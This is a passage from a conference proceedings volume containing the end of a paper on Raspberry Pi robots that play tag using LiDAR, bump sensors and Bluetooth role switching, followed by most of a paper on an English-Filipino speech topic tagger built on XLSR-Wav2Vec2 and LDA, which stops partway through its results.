randomly around the available space. Both robots will be equipped with bump sensors on all faces. The robot will initiate/wait for a handshake when a bump sensor is triggered. If there is no handshake, the robot will continue on its way. If there is a handshake, the robot will switch roles. The new running bot will take off immediately in a randomly determined direction, and the new It-bot will wait for a predetermined amount of time before setting off in pursuit. Robots will remain inside a bounded area using line sensors to detect when they are about to move “out of bounds” and adjust their direction to stay within the play area. The software part of the project was written in Python 3 and utilized several available libraries. For example, PiGPIO was used to handle the GPIO tasks, PyBluez was used for Bluetooth, and Slamtec’s RPLiDAR library, rplidar, was used for the LiDAR. Individual drivers for each component were written and imported into other code, allowing us to test each piece individually and build progressively more complicated behaviors. Having the pin information and functions like “stop,” “go,” and “connect” in self-contained files made it simple to access the component functionality while keeping the main block of code simple and elegant. Additionally, when I.O. pins were changed, only a single file needed to be changed to allow all test programs to function as expected. Drivers were written for the motors, bumpers, line sensor, Bluetooth, and LED strip light.
Fig. 2. TagBot Body and Parts
4 Design Hardware Component The series of materials that will be used to reach the goal at hand most efficiently will be shown below. It will include an image with a brief description of its general purpose and how directly it will be used in the implementation. LiDAR (LIght Detecting And Ranging) uses ranged laser pulses to map the environment, as in Fig. 3. The A1M8 is a 360° 2D system. It will provide a rough silhouette of the area out to 12 m. The LiDAR is used to initially identify an object inside the play area and set a heading to come into contact with it. The rplidar Python library was used
420
M. Ayad et al.
Fig. 3. Slamtec RPLiDAR A1M8
to control LiDAR. Functions in the library allow you to take complete scan information or receive individual measurements. For our purposes, we only used unique measurements. Each measure is returned from the LiDAR as a list consisting of quality of scan, angle, and distance, where quality is related to the amount of reflected light returned to the sensor. Angle and distance are the two measurements that were most concerned. We used quality only to discard any potentially destructive scans, where the rate came back as 0. Because of the placement of the holes on the chassis, the LiDAR wasn’t able to be placed straight on. To find the angle of offset, a series of objects was placed at the front, left, back, and right sides of the robot, and the resulting angle measurements were used to find our “North”, “South”, “East”, and “West”. These angles were 6.8712, 185.250, 98, and 276.1156, respectively. With these angles established, readings were grouped into approximately 45° headings and timed motor runs were used to adjust the robot’s direction. Figure 4 shows the line sensor. Vex line sensors will be used to tell the robots if it detects a very dark surface. For example, black electrical tape is used around a surface. In this process, it shines a form of light onto the surface. It can tell based on the amount of reflection coming back to the laser. That is projected onto the further movements. Finally, the essentials are used to make a barrier surrounding the place in which the robots will be playing. Figure 5 depicts the processor of the assembled robot. Raspberry Pi 3 B+ is one of the latest Raspberry Pi boards available. It provides a 64-bit quad-core processor, integrated Bluetooth, 26 general purpose I.O. pins, dedicated IIC pins, and dedicated 3.3 V and 5 V power and ground pins. The integrated Bluetooth was used as the final confirmation. On being tagged, the NotIt robot opens up a Bluetooth server connection and waits for the It robot to connect. Once the connection is established, the two robots exchange unique identifications, check the identification against a list of playing robots, confirm with each other, and then change roles.
Implementation of a Tag Playing Robot for Entertainment
421
Fig. 4. Line sensor
Fig. 5. Raspberry Pi 3 B+
In the scope of this paper, with just two robots, this was accomplished by hard coding the MAC addresses of each Pi into the Bluetooth code as “myAddress” and “yourAddress”. Since the MAC address should be unique to any device attempting to connect, this eliminates the possibility of someone’s phone connecting and accidentally triggering the robot to switch roles, for example.
Fig. 6. Lynx motion BMP-01 bumper switch assembly kit
Four bumpers (Fig. 6) would be needed to cover all faces of each robot. However, it turned out that the chassis was so small that only three whiskers per robot were required.
422
M. Ayad et al.
The relay switches were attached to the top of the second layer of the chassis, with the whiskers curling around the robot in a circle. All three whiskers were routed through a series of OR gates to a single Raspberry Pi pin. It allowed for the activation of any relay, or combination of, to trigger a hi, and perform the necessary action. After being bumped, the robots stop their motors and ask for Bluetooth identification. The three-layer chassis kit was used so that it would give us plenty of room to hold components and still result in a small, manageable robot, as in Fig. 7. The chassis ended up being smaller than expected, which resulted in the creative use of space. We used extra standoffs to make each layer tall enough to have parts on each side. We ended up with a very tall, narrow robot. As a result of that, and the robot being top heavy from the LiDAR, we had to be very careful about motor speeds. Anything faster than about 40% usually resulted in the robot tipping over. However, to get the bumpers to register, we couldn’t run the robots at much under 35%, or they didn’t meet enough force to press the button. It left us with a very narrow PWM range.
Fig. 7. SparkFun three-layer chassis kit
Fig. 8. Cytron MDD10A motor driver
Figure 8 shows the Cytron MDD10A motor driver board. It provides bi-directional support for two D.C. motors, up to 30 V and 30 A for each channel. In addition, it gives both 3.3 V and 5 V logic levels and PWM support for up to 20 kHz. The board was straightforward to set up and use. Each motor required two pins from the Raspberry Pi;
Implementation of a Tag Playing Robot for Entertainment
423
one to control the direction and one for the PWM. We used the PiGPIO library to code the motor driver and provide functions to go forward, backward, turn left and right, and stop. Figure 9 shows a fully assembled TagBot. The LiDAR was attached to the very top layer of the chassis. Standoffs were used to raise it and make room for the communication cable and USB adapter board beneath it. This extra space was initially intended for the LED driver board but ended up where the battery pack was stored instead. The underside of the top layer is where the Raspberry Pi was attached, above the perfboard that we had soldered containing the bumper circuit and the connections for the peripherals. The PiWedge was connected to this board as well. The perfboard was held apart from the chassis by standoffs, and the relay switches for the bumpers were attached directly to the chassis between it and the perboard. The underside of the second layer held the motor driver board. The motors and wheels were attached to the bottom layer, and between them was a second perfboard that held the circuit, received the analog input from the line sensor, and routed it through the potentiometer and op-amp to the I.O. pin connection on the PiWedge. Finally, the line sensor was attached at the bottom with a ¼” standoff, bringing it as close to the ground as possible. We made use of the existing holes in the chassis as much as possible, but in some cases, there was no hole where we needed it to be, and posts were glued to the chassis instead.
Fig. 9. Fully assembled tag bot
424
M. Ayad et al.
5 Discussion and Results There were multiple obstacles faced when conducting the robot’s design. First, we had to start from smaller side circuits before developing the robot. It allowed us to know how the setup would look. The major challenge, however, was the amount of power needed for the robots. For it to have a line sensor, bumper sensor, and motors running simultaneously, it was hard to maintain enough power with 4 A.A. batteries. Our solution was switching the power supply to portable charger packs that give enough voltage and current. Although there were still times that Raspberry Pi3 B+ would shut down due to insufficient power, it was more convenient to have it with the packs. We had to use the oscilloscope to understand that having LEDs would not be possible, only outputting 5 V and 3.3 V. Finally, threading in Python was an issue at first. The engineering design principles were heavily used in understanding how to make all the sensors work alongside Bluetooth to formulate a connection. It took a series of trial and error with the code to work continuously. The designed TagBots’ most unique ability would be through Bluetooth connection they switch roles. Once the “It” bot found the other robot, it could simultaneously form that connection through the bumpers. First, we had to ensure that the bumpers were correctly established on both ends. If not, the signals wouldn’t transfer. Then some research on how to hook up a Pi to Bluetooth. Once that was done, we got the information from both. It was through python3 that we tested back and forth a mini response between the robots. It went like Client Hello, Server Hello, Client How are you? The server I’m doing well Client Bye, Server Bye. Once these commands were successfully distributed between the two clients and the server, we knew that the Bluetooth connection worked effectively. The proper channels had to be implemented to conduct the role switch successfully. Overall finishing the robot’s design, our knowledge enhances the coding of Python and the use of Raspberry pi. It was very mind-opening how much Raspberry B+ can do. When we started the project, we were beginners to Python, but we have become experts in how it works now. Also, we acquired knowledge of circuit development, creating and establishing the structure. Troubleshooting has to be one of the leading learning strategies learned throughout group work. We were learning how to pinpoint an area where the problem is and focus on finding the solution. It was almost 50% of the tools needed for the project. We acquired most of our information from discussions with professionals and research. These are essential tools we will need further in the electrical field. We ran different experimental tests in a playing field of an area of 3 m2 , as shown in Fig. 10. In one scenario, robots started to identify and chase one another to tag and hand off “It” protocols. Once tagged, It will initiate a handshake method. Then, it checks that the tagged robot is “playing” and switches roles. Next, the runner robot moves away while the other one waits. Finally, the “It” robot seeks the Runner within the play area and proceeds to try and tag him. The identification process is completed utilizing LiDAR object detection and Bluetooth signal confirmation.
Implementation of a Tag Playing Robot for Entertainment
425
Fig. 10. Designed TagBots in the playing field
6 Conclusion Playing tag reinforces spatial awareness, obstacle avoidance, team member identification, and dynamic role switching for children. These same skills can be vital to the success of a multi-robot system. We intend to take this simple, universal game and apply the same concepts to robotics. Using a 360-degree, 2D LiDAR mounted on each robot, they can assess the play area and identify potential players. Secondary identification, and role confirmation, can be made through additional sensors. Final confirmation and role switching are initiated through Bluetooth pairing of the robots. The implementation and the experimental tests were very successful and promising for possible extensions and future work, such as adding other playing robots and positioning different obstacles into the playing field. Also, we will address and add additional games such as Marco-Polo, Hide and Seek, Blob Tag, and Red Rover. Moreover, we plan to include robots’ vision through cameras and improve team member identification.
References 1. Pratticò, F.G., Lamberti, F.: Mixed-reality robotic games: design guidelines for effective entertainment with consumer robots. IEEE Consum. Electron. Mag. 10(1), 6–16 (2021) 2. Cosentino, S., Randria, E.I.S., Pellegrini, J., Lin, T., Sessa, S., Takanishi, A.: Group emotion recognition strategies for entertainment robots. In: 2018 IEEE/RSJ International Conference on Intelligent Robots and Systems (IROS), pp. 813–818 (2018) 3. Westlund, K., Jacqueline, M., et al.: Flat vs. expressive storytelling: young children’s learning and retention of a social robot’s narrative. Front. Hum. Neurosci. 11, 295 (2017) 4. Jochum, E., Millar, P., Nuñez, D.: Sequence and chance: design and control methods for entertainment robots. Robot. Auton. Syst. 87, 372–380 (2017)
426
M. Ayad et al.
5. Catapang, A.N., Ramos, M.: Obstacle detection using a 2D LIDAR system for an autonomous vehicle. In: 2016 6th IEEE International Conference on Control System, Computing and Engineering (ICCSCE), pp. 441–445 (2016) 6. Islam, M.J., Hong, J., Sattar, J.: Person-following by autonomous robots: a categorical overview. Int. J. Robot. Res 38, 1581–1618 (2019) 7. Kim, J., Jeong, H., Lee, D.: Single 2D lidar-based follow-me of a mobile robot on hilly terrains. J. Mech. Sci. Technol. 34, 3845–3854 (2020) 8. Chen, B.X., Sahdev, R., Tsotsos, J.K.: Person following robot using selected online AdaBoosting with stereo camera. In: Proceedings of the 2017 14th Conference on Computer and Robot Vision (CRV), Edmonton, AB, Canada, pp. 48–55 (2017) 9. Do, M.Q., Lin, C.H.: Embedded human-following mobile-robot with an RGB-D camera. In: Proceedings of the 2015 14th IAPR International Conference on Machine Vision Applications (MVA), Tokyo, Japan, pp. 555–558 (2015) 10. Dekan, M., František, D., Andrej, B., Jozef, R., Dávid, R., Josip, M.: Moving obstacles detection based on laser range finder measurements. Int. J. Adv. Robot. Syst. 15(1), 1729881417748132 (2018) 11. Cooper, M.A., Raquet, J.F., Patton, R.: Range information characterization of the Hokuyo UST-20LX LIDAR sensor. Photonics 5(2), 12 (2018) 12. Corti, A., Giancola, S., Mainetti, G., Sala, R.: A metrological characterization of the Kinect V2 time-of-flight camera. Robot. Auton. Syst. 75, 584–594 (2016) 13. Kamezaki, M., Kobayashi, A., Yokoyama, Y., Yanagawa, H., Shrestha, M., Sugano, S.: A preliminary study of interactive navigation framework with situation-adaptive multimodal inducement: pass-by scenario. Int. J. Soc. Robot. 12, 567–588 (2019)
English-Filipino Speech Topic Tagger Using Automatic Speech Recognition Modeling and Topic Modeling John Karl B. Tumpalan and Reginald Neil C. Recario(B) University of the Philippines, 4031 Los Baños, Philippines {jbtumpalan,rcrecario}@up.edu.ph
Abstract. We present an English-Filipino Speech Topic Tagger that transcribes English-Filipino speech audio into text and produces relevant keywords from such audio. The tagger was implemented in two parts by transcribing speech data to text using a Filipino fine-tuned English XLSR-Wav2Vec2 Automatic Speech Recognition (ASR) model then extracting context from the transcription using a generative statistical model used for Topic Modeling, Latent Dirichlet Allocation (LDA). The trained English-Filipino ASR model shows a 26.8% Word Error Rate in the validation set. The Speech Topic Tagger was evaluated through an observation-based approach using different YouTube videos as input and achieved the highest evaluation of 46.15% accuracy and lowest evaluation of 14.28% accuracy in producing relevant top-weighted words. Keywords: Automatic Speech Recognition · Topic modeling · Speech tagging · XLSR-Wav2Vec2 · Speech recognition for English-Filipino · Latent Dirichlet Allocation · Transfer learning · Audio and speech processing
1 Introduction Automatic Speech Recognition (ASR) allows a computer system to process a speech audio and convert the audio into speech text. In terms of ASR, previous solutions in the earlier years used Hidden Markov Model (HMM)-based toolkits in language and acoustic modeling. Today, recent solutions in the challenges of DCASE are modeled using neural networks such as Deep Neural Networks (DNN), Recurrent Neural Networks (RNN), Convolutional Neural Networks (CNN), or a mixture of RNN and CNN. On the other hand, audio tagging is the act of tagging audio recordings with single or multiple tags that can be used as labels. This labeling capability to different audio sounds can be used for several applications such as music recommendation [1], audio surveillance/alarms [2], animal monitoring systems [3], and multimedia searching based on content. However, manual audio tagging is quite tedious for the tagger. Considering the amount of audio data needed to be tagged for some use cases, manual tagging will automatically be out of the possible solutions. Because of this, numerous studies were conducted for automatic tagging of audio files using newer technologies. Since 2016, © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 427–445, 2023. https://doi.org/10.1007/978-3-031-28073-3_31
428
J. K. B. Tumpalan and R. N. C. Recario
researchers organize an annual challenge on Detection and Classification of Acoustic Scenes and Events (DCASE) that aims to reliably recognize sound scenes and individual sources in realistic soundscapes despite the presence of multiple sounds and noise. This research study aimed to design and implement an English-Filipino Speech Tagger. Generally, the researchers aimed to create an application that can perform automatic speech topic tagging. Specifically, the researchers aimed to: (a) implement speech tagging in two parts - transcribing speech data using Speech-to-Text of an ASR then extracting context in the output data using Topic Modeling; (b) implement modeling techniques to test the compatibility of such methods in an Automatic Speech Recognition System for English-Filipino; and (c) evaluate the results of Latent Dirichlet Allocation (LDA) on extracting topics in an English-Filipino audio data collection through transcriptions of an English-Filipino ASR Model. This study provides an avenue to address the research gap in ASR implemented in Filipino or English-Filipino given the wide array of applications that make use of speech recognition, and the existing complexity of the Filipino language. Its significance extends to the use of speech-related technologies, models, and libraries for an application that recognizes the said low-resource language. Additionally, the study sought to bridge the audio tagging use case through an ASR that can recognize English and Filipino to be used for Filipino-context use cases such as content-based tagging for Filipino speech data. The study also initiated using a two-part process of speech tagging in a bilingual context. As other papers were using LSTM-based RNNs, or transfer-learned CNNs for the Mel Spectrogram representations of speech for speech recognition tasks, the study used XLSR-Wav2Vec2, a multi-lingual version of Wav2Vec2 by Facebook AI, for its speech recognition part. The final model was trained on Filipino speech data with high occurrence of code-switching on top of a pre-trained English model.
2 Literature Automatic Speech Recognition (ASR) is the technology that allows the recognition of speech signals to machines. These signals are converted into a sequence of words, phrases, or sentences using different models implemented in a device or computer. These linguistic entities can be used as a command for data entry, database access [4] or trigger for machines to interact with the signals by firing a response to resemble human conversation [5]. Using this, an ASR system can allow the use of voice to trigger machine commands for IoT devices. This use case is very useful as the communication between the machine and the user will not go through an interface but only through natural language signals, which will improve the accessibility of modern systems to less knowledgeable users. Several applications nowadays require ASR to be computationally light, accurate, adaptable, and effective. This study attempts to explore the methods in ASR to achieve these requirements in Filipino-English speech as most Filipinos use code switching in normal conversations and professional discussions. However, the development of ASR is complex in nature. Typical ASR system architecture needs very meticulous pre-processing before executing feature extraction. The
English-Filipino Speech Topic Tagger
429
lexicon, language model, and acoustic model are needed to create a working decoder or speech recognizer. These models are distinct, needing unique speech and text corpus for every language, and face the challenges of the variability, grammar, vocabulary, characteristics, speed of utterance, pronunciation, and environmental noises [6]. There have been attempts to create an Automatic Speech Recognition system for Filipino. An ASR using Convolutional Neural Networks was built by Hernandez, Reyes, & Fajardo last 2020 [6] that directly maps spectrogram images to phonemes and speech representations. Briones, Cai, Te, & Pascual (2020) also developed an Automatic Speech Recognizer for Filipino-Speaking Children [7]. These studies are important baselines for Automatic Speech Recognition in Filipino as our language data is considered as low resource compared to other languages in the world. 2.1 Latent Dirichlet Allocation Blei, Ng, & Jordan (2003) described Latent Dirichlet allocation (LDA) as a generative probabilistic model for collections of discrete data such as text corpora. LDA is a threelevel hierarchical Bayesian model, in which each item of a collection is modeled as a finite mixture over an underlying set of topics. In the LDA model, two distributions are generated to explore topics in a document: first is a document-topic distribution and second is the topic-word distribution. LDA is an unsupervised model which makes it fit to several use cases of topic modeling. Kresetel, Fankhauser, & Nejdl (2009) investigated the use of LDA for collective tag recommendation [8]. In their study, LDA recommended more tags and it achieved better accuracy, precision, and recall than standard association rules that were suggested previously for tag recommendation. Today, there are already numerous tag recommendation systems that are studied for several software information sites such as the study of Wang et al. (2017) that used EnTagRec and EnTagRec++ [9] which used a labeled LDA [10] that enabled the software to pre-define a set of tags as the target topics to be assigned to documents. Newer comparative studies are also conducted such as the dissertation of Anaya (2011) and study of Kalepalli, Tasneem, Phani Teja & Manne (2019) that compared Latent Semantic Allocation (LSA) and Latent Dirichlet Allocation (LDA). These studies are conducted to help organizations mine, organize, and identify data from online documents following the emergence of web technologies. The study of the former recognized LDA to have better accuracy (82.57 vs 75.3 of LSA) and divergence. Additionally, Liu, Du, Sun, and Jiang (2020) proposed an interactive Latent Dirichlet Allocation model that employs a new indicator to measure topic quality [11]. Aside from the standard objective topic-word distribution, their proposed model considers the subjective topic-word distribution. Based on their experimentation, their model can mine high-quality topics and is more robust than the standard LDA model. LDA has been recognized as a useful tool in several use cases, but it still poses different limitations such as topic quality and stability [12].
430
J. K. B. Tumpalan and R. N. C. Recario
3 Materials and Methods To implement the speech topic tagger, an Automatic Speech Recognition model has been built to transcribe speech data. Then, Latent Dirichlet Allocation has been applied to produce the topic distributions. The order of the process is illustrated in Fig. 1.
Fig. 1. Speech topic tagging process implemented in this research composed of several stages.
The ASR system used the XLSR approach by Conneau, Baevski, Collobert, Mohamed, & Auli (2020). A visualization of the XLSR model by the said authors is shown in Fig. 2. This model learns to share discrete tokens across languages, creating bridges across it and uses speech inputs from multiple languages.
Fig. 2. ASR architecture – XLSR approach [13]
In Conneau, et al.’s paper, they highlighted the effectiveness of unsupervised crosslingual representation in terms of Phoneme Error Rate (PER) by comparing XLSR to
English-Filipino Speech Topic Tagger
431
several baseline results from Rivière et al. (2020) and other monolingual models that are pretrained with one or ten languages and fine-tuned on one or ten languages. Figure 3 shows the said comparison of models from the same paper. This is also the main rationale to use the XLSR-53 models for the transfer learning process.
Fig. 3. Common voice and baseline phoneme error rate [13, 14]
3.1 Dataset English. The data set used in the pre-trained English Automatic Speech Recognition Model of jonatasgrosman [15] came from an open source, multi-language data set of voices that anyone can use to train speech-enabled applications: Common Voice Corpus by Mozilla.org. The study has been tested and trained using the 6th version from December 2020, Common Voice Corpus 6.1 by Jonatas Grosman. The researchers used a pretrained model because of the limitations of their own machines or registered cloud services. Common Voice 6.1 has a total size of 56 GB. The data set includes 1,686 validated hours out of the overall 2,181 total hours of speech. The number of unique voices is up to 66,173 with an audio format of MP3. Filipino. The data set used for fine-tuning the model in Filipino language came from MagicData of Beijing Magic Data Technology Co., Ltd. which was released last April 2021. It has 16 kHz, 16 bits, mono audio parameters, in a WAV audio format. This opensource data set consists of 4.58 h of transcribed Filipino scripted speech focusing on daily use sentences, where 4,073 utterances contributed by ten speakers were contained with a total size of 555 MB on disk. Seven speakers were from CARAGA, two speakers were from NCR, and one speaker was from CALABARZON. They were a mixture of male and female participants with age range from 11 years old to 36 years old.
432
J. K. B. Tumpalan and R. N. C. Recario
3.2 Pre-processing The audio inputs have been preprocessed into a one-dimensional array format expected by the XLSR-Wav2Vec2. The wav files from the MagicHub data set have been loaded utilizing the Huggingface’s Datasets library. This was done using a custom dataset loading script, like Mozilla’s Common Voice, so that it will be structured in a special Dataset class after loading into the training notebook. It was used for easily accessing and sharing the datasets, the parameters, and the evaluation metrics for the speech recognition tasks. It is also using the Apache Arrow framework to be able to handle large datasets with zero-copy reads without any memory constraints for optimal speed and efficiency. After storing the values and sampling rate of the speech data, it has been resampled to match the sampling rate of the data used to pre-train the XLSR-Wav2Vec2 model. It is always crucial to verify that the data used to finetune the model has the same sampling rate as the data used to pre-train the model, which is sampled at 16 kHz. The data is down sampled using the task preparation methods of the Dataset object from huggingface. 3.3 Modeling Automatic Speech Recognition models transcribe speech data to text data. Two important components of the modeling part are the feature extraction and the training phase. This subsection describes each of these components. Feature Extractor and Tokenizer. The Wav2Vec2 model has a built-in feature extractor - Wav2Vec2FeatureExtractor and Tokenizer - Wav2Vec2Tokenizer. Both classes have been pipelined into a single Wav2Vec2Processor so that the modeling process will only require 2 objects - a processor and a model, instead of 3. Training. After the processing of data, Hugging Face’s Trainer has been used to finetune the pretrained XLSR-Wav2Vec2 English model on Filipino. This trainer is a class that provides an Application Programming Interface (API) for feature-complete training and evaluation loop for PyTorch. Necessary hyper-parameter tuning has been applied to get the most optimal results on the first few model trainings. The researchers have been utilizing a cloud computing platform, the Google Colaboratory Notebook, to train the model because their own physical machines have been unable to handle the stress of the training process in terms of disk, CPU, and GPU usage.
3.4 Topic Modeling: Latent Dirichlet Allocation The researchers performed data preprocessing and generation using the gensim and nltk python libraries. Pre-processing. The pre-processing is composed of Tokenization and Stop word removal phases. In the tokenization, the whole ASR output has been split into sentences. The sentences were split into words. The words were lowercased, and punctuations were removed. In the stop word removal phase, stop words or words what do not have much relevance or information to the text, have been removed.
English-Filipino Speech Topic Tagger
433
Generation. For the generation of the topics, the researchers run LDA using Term frequency-inverse document frequency (TF-IDF) for creating features from text. The TF-IDF model contains information on the more important words and the less important ones as well. For each pre-processed document, a dictionary will be created to keep the number and frequency of words. A TF-IDF model will be created using this dictionary before running Latent Dirichlet Allocation to generate the word-topic distributions.
3.5 Evaluation ASR: Word Error Rate (WER). WER is recommended by the US National Institute of Standards and Technology for evaluating the performance of ASR systems [16]. It is formulated by the number of transcription errors that the system makes over the number of words that were said by the speech signal sender. The higher the WER, the less accurate the system. In WER, there are three categories of errors which is described namely 1) Substitutions, concerned when the system transcribes one word in place of another, 2) Deletions, concerned when the system misses a word entirely, and 3) Insertions concerned when the system adds a word into the transcript that the speaker did not say. Topic Modeling: Observation-Based Approach. Quantitative evaluation techniques cannot be fully implemented in the Filipino language due to resource limitations in terms of corpus, dictionary, and phrase models. Because of this, the researchers initiated an alternative approach to evaluate the topic models - human judgement through observations. The topics that have been identified by the topic models were presented to different respondents while they were asked if the following topics are related to the main audio data that was fed to the tagger. Topic modeling does not consider the semantics of topics, especially in low-resource languages, so evaluating the topic output of the tagger inevitably required human interpretation.
4 Results and Discussion The English-Filipino Speech Topic Tagger is an executable code in a web-based interactive computing platform - Google Colaboratory. Anyone can make a copy of the notebook via Google Colab and test its functionality using their own pre-processed data and own dataset script. Predictions will automatically be generated, and the topic salience will be visualized after changing all necessary inputs and running all the cells in the notebook. As planned, the Speech Topic Tagger solution has been pipelined in two parts transcription using an English-Filipino Automatic Speech Recognition (ASR) Model and topic modelling using a generative statistical model, Latent Dirichlet Allocation. The researchers trained several models to observe the training results and use the most optimized model to be used in the solution pipeline for the Speech Tagger. The next sections will show: (a) the training evaluation of the English-Filipino Automatic Speech
434
J. K. B. Tumpalan and R. N. C. Recario
Recognition Models; (b) a comparison of the English-Filipino ASR model to the Filipinoonly ASR model; (c) the results of the tagger from some YouTube videos pre-processed to become input data sets, (d) and the evaluation of users to the output of the speech tagger. 4.1 English XLSR Wav2Vec2 Fine-Tuned to Filipino A total of nine English-Filipino models have been trained. In Table 1 are the general hyperparameters used by the Huggingface Trainer to train the models, with main differences in the number of epochs and the value of the learning rate. Table 1. General hyperparameters for fine-tuning the XLSR-Wav2Vec2 models Parameter
Value
Learning rate
.001, .002, & .0003
Train batch size
8
Evaluation batch size
8
Gradient accumulation steps
2
Total train batch size
16
Optimizer
Adam with betas and epsilon
Learning rate scheduler
Linear
Learning rate scheduler warmup steps
500
Number of epochs
20, 30, 40
The parameters in Table 1 yielded the training loss, validation loss, and word error rate in Fig. 4 with respect to learning rate and epoch variations. Out of the 4,073 utterances, 3,055 utterances or 75% of the total speech files have been used for training the models; while the 1,018 utterances, or the remaining 25% of the speech files have been used for model evaluation. The validation set has also been used for testing the initial solution of the Speech Topic Tagger.
Fig. 4. Model evaluation per epoch, learning rates: 0.0003, 0.001, 0.002
English-Filipino Speech Topic Tagger
435
As displayed in the evaluation, the trained models were overfitting to training data. The training losses were ranging from .029 to .129 but the validation losses were ranging from .45 to 1.58. The model does not work well with new data because of the limited data points present in training. Two of the trained models displayed optimal training loss, validation loss, and word error rate compared to the other models. The first model, with 40 epoch and 0.0003 learning rate variation of the general hyperparameters, yielded 0.0294 Training Loss, 0.4561 Validation Loss, and 0.2632 Word Error Rate. The second model used 30 epoch and 0.0003 learning rate. It yielded 0.0395 Training Loss, 0.4738 Validation Loss, and 0.268 Word Error Rate. Comparing the two models, the first model produced the lower summation of errors in the training and validation sets. It also had a slightly better word error rate compared to the epoch 30 model. However, since the models were overfitting, the researchers chose a model with a good error rate but with the best fit. Charting the metrics in a log-scaled metrics axis, epoch 30 displayed a better fit than epoch 40 variation. The training loss of epoch 30 was 8.34% of the validation loss while the training loss of epoch 40 was just 6.45% of its validation loss. To further visualize, the normal and log-scaled version of the loss metrics are displayed in Fig. 5. The researchers only considered the fit since the epoch 40 only had a 0.52%-word error rate improvement from the epoch 30 and the Training Loss to Validation Loss ratio jumped higher. With this, the epoch 30 model was used for the implementation of the speech topic tagger.
Fig. 5. Epoch 30 and 40, Normal vs Log-scaled training loss and validation loss
Some model predictions using the validation set is displayed in Table 2. It is observable that the predictions were almost perfect, and the word errors were barely present in the first few examples in the validation set. The same is the case when the model predictions were tested real-time or recorded using the Huggingface’s Hosted Inference API. In this method, the automatic speech recognition model was loaded into the browser. Users can record audio through their browsers and compute predictions, or just simply enable the real-time recognition feature and speak into their microphone while the model is computing the speech signals
436
J. K. B. Tumpalan and R. N. C. Recario Table 2. Model prediction examples – validation set
Speech
Model prediction
Sa may malapit dito sa bahay
sa may malapit dito sa bahay
Sa ganang akin lang naman ito
saga ng akin lang naman ito
Ang ganda ko naman kung ganun!
Ang ganda ko naman kung ganun
Parang ang sarap mag karaoke pag uwi
Parang ang sarap magkarooke pag-ui
simultaneously. The model was observed to be having trouble in correctly spelling predictions as sounds can be matched to Filipino or English phonemes. More ASR model predictions using the Inference API are presented in Table 3. Table 3. Model prediction examples – inference API Speech
Model prediction
Ang pinakamahalaga, the people before the government
ang pinakamahalaga da pipal before the gobernment
Ito ay demonstration ng aking SP
ito ay demonstration ng aking s p
Graduate ka na ba?
gradwit ka na ba
Saang company ka nag-apply?
Saang kampani ka nag aply
4.2 Comparison of Transcriptions: Base XLSR-Wav2Vec2 Model Fine-Tuned to Filipino To compare the effectiveness of fine-tuning from a pre-trained English XLSR-Wav2Vec2 model, a base XLSR-Wav2Vec2 model that was finetuned to Filipino was created. Both models have been trained using the same training parameters and only differed in the base models used for Transfer Learning. To further test the models, three videos sourced from YouTube with different levels of noise were preprocessed and fed to the ASR Models. The videos were TedxTalks’ YouTube video of Sabrina Ongkiko’s “What Do You Want To Be?”, Rec-Create’s YouTube video “We Asked People About The First Time They Fell in Love”, and Rec-Create’s YouTube video “What does the Anti-Terror Law Even Mean?”. Tables 4, 5, and 6 show the predictions of the models in specific excerpts of the audio data. It is also relevant to note that the different sets of external YouTube data have different levels of noise. These audio contents have their introduction and ending removed, then were spliced to five-second intervals as the virtual machine cannot handle batched audios with long duration per set due to GPU RAM limitations during training. The first YouTube video which is the Ted talk of Sabrina Ongkiko has little to no noise due to some audiences responding to some questions and the interactivity of her presentation.
English-Filipino Speech Topic Tagger
437
Table 4. Model prediction examples – external YouTube data (No to Low-Noise) – TedxTalks’ YouTube video of Sabrina Ongkiko’s “What Do You Want To Be?” (https://www.youtube.com/ watch?v=ZKaG0cYztis) Speech
English-Filipino model prediction
Filipino model prediction
Hanap ang daan para hanap angdaan para hanapang daan para makalabas para kung mawala makalabas at kung mawala ka makalabas at kung mawala ka ka, mananatili ka sa loob mayanatili ka sa loo mananatili ka sa loo Ganoon ang buhay ni jackson. Laking kalye si
ob ganon ang buhay ni jackson lakingkalye si
ob ganun ang buhay ni jackson laking kalya si
jackson. Ang tatay niya ay nakakakulong. Ang nanay niya
jackson ang tatay niya ay nakakulong ang nanay niya
jakzon ang tatay niya ay nakakulong ang nanay niya
Table 5. Model prediction examples – external YouTube data (Medium-Noise) – Rec-Create’s YouTube video “We Asked People About the First Time They Fell in Love” (https://www.you tube.com/watch?v=-d8pAMQ_USk) Speech
English-Filipino model prediction
Filipino model prediction
To fight for our love kahit na ayaw ng parents ko, that’s why any kind of relationship
o fighth fur our love kahit nayo nag perints ko datswy any kind nerelation ship masis
u fiht for ar love kahit nayo ng pariens co datsway aenny kyndaverlation cif maseo
The first time I fell in love the first time ay fell in love was safirs tim ay fellen love vhuss was in fourth grade.. grade ten fourthgame radseven akoo kenfort grad reaade seven ako seven ako We were sort of rivals, hanggang ngayon magkakilala parin kami, I liked her con(tinuously)
nsi were sort of rivals hanggang ensiver sourtof rivals hanggang ngayon magkakilala paring ngayon magkakilala paring gami ay likeh herco kami ay lihkhercon
The second YouTube video about first love experiences has low-volume background music throughout the whole video content. The last data set which was labeled with high noise has strong electronic background music with frequent bass drops. According to the training evaluation of both models in their 5,600th step, the EnglishFilipino model yielded a lower word error rate at 26.84% versus the Filipino only model at 29.22%. It was also observed in the prediction examples that the predictions of the English-Filipino model tend to catch more closer predictions than the Filipino Model as some of the speakers frequently code-switches in their scripts.
438
J. K. B. Tumpalan and R. N. C. Recario
Table 6. Model prediction examples – external YouTube data (High-Noise) – Rec-Create’s YouTube video “What does the Anti-Terror Law Even Mean?” (https://www.youtube.com/watch? v=MBS1jnfCCCs) Speech
English-Filipino model prediction
Filipino model prediction
..dapat kung ano ang trabaho ay dapat kung ano ang trabaho y dapat kung ano ang trabaho ng isang branch ng gobyerno, ng isang branch ng gobyerno ng isang branch ng gobyerno hindi dapat ito kinukuha hindi dapat ito ginukuha hindi dapat ito ginokuha this consist of different types of crimes, involving killings, kidnappings
dis consist of different types of disconsist ob difrient tpsof crimes involving killinks crimes emvolving kilings kidnapings kidnappings
At pagkalat ng feat at panic sa at pagkalat ng feare at panic sa at pagkalad ng sire at panik sa mga tao. Present time, the mga tao present tme dahuman mga tao presen time human security a(ct) sikurti a duhunman sigurty a
4.3 Topic Tagger Results The researchers initially tested the Topic Modeling technique in the validation set. The visualization of Topic salience values is displayed in Fig. 6.
Fig. 6. Overall term frequency of the top salient terms in the results of the speech tagger results in the validation set
